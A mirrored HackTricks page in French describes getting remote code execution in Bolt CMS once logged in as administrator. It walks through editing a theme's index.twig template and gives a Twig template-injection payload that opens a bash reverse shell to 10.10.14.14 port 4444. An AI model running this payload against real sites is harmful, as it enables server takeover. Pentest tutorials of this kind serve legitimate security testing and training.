Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

3.6 KiB
Raw Blame History

Bolt CMS

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS HackTricks)!

Autres façons de soutenir HackTricks :

RCE

Après vous être connecté en tant qu'administrateur (allez à /bot pour accéder à la fenêtre de connexion), vous pouvez obtenir une RCE dans Bolt CMS :

  • Sélectionnez Configuration -> Voir la configuration -> Configuration principale ou allez au chemin d'URL /bolt/file-edit/config?file=/bolt/config.yaml
  • Vérifiez la valeur du thème
  • Sélectionnez Gestion des fichiers -> Voir et modifier les modèles
  • Sélectionnez la base du thème trouvée à l'étape précédente (base-2021 dans ce cas) et sélectionnez index.twig
  • Dans mon cas, cela se trouve dans le chemin d'URL /bolt/file-edit/themes?file=/base-2021/index.twig
  • Définissez votre charge utile dans ce fichier via injection de modèle (Twig), comme : {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Et enregistrez les modifications
  • Effacez le cache dans Maintenance -> Effacer le cache
  • Accédez à nouveau à la page en tant qu'utilisateur régulier, et la charge utile devrait être exécutée
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS HackTricks)!

Autres façons de soutenir HackTricks :